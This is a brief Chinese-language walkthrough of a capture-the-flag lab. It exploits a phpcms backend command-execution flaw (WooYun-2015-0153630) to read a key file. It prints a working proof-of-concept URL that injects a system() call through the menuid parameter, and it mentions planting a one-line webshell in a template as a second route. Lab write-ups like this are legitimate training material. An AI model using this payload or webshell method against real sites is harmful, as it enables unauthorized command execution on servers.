靶场地址:
https://www.mozhe.cn/bug/detail/ajFqNFRadkk2alNtOVRUVm9MSXA2Zz09bW96aGUmozhe
用到的漏洞介绍:
漏洞编号:WooYun-2015-0153630
漏洞名称:phpcms后台低权限任意命令执行
Poc:
index.php?0=[命令]&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block
首先找到后台地址,养成好习惯先查看robots.txt是否有有用的信息
发现了后台地址,并且账号密码自动填充,可以直接登录
这里获得key有两种方法,一种是在界面-模板风格修改代码注入一句话木马,然后使用菜刀连接。
一种是使用上述漏洞执行代码
执行ls命令,发现key所在
执行cat key_16041211526820.php,查看网页源代码
网友评论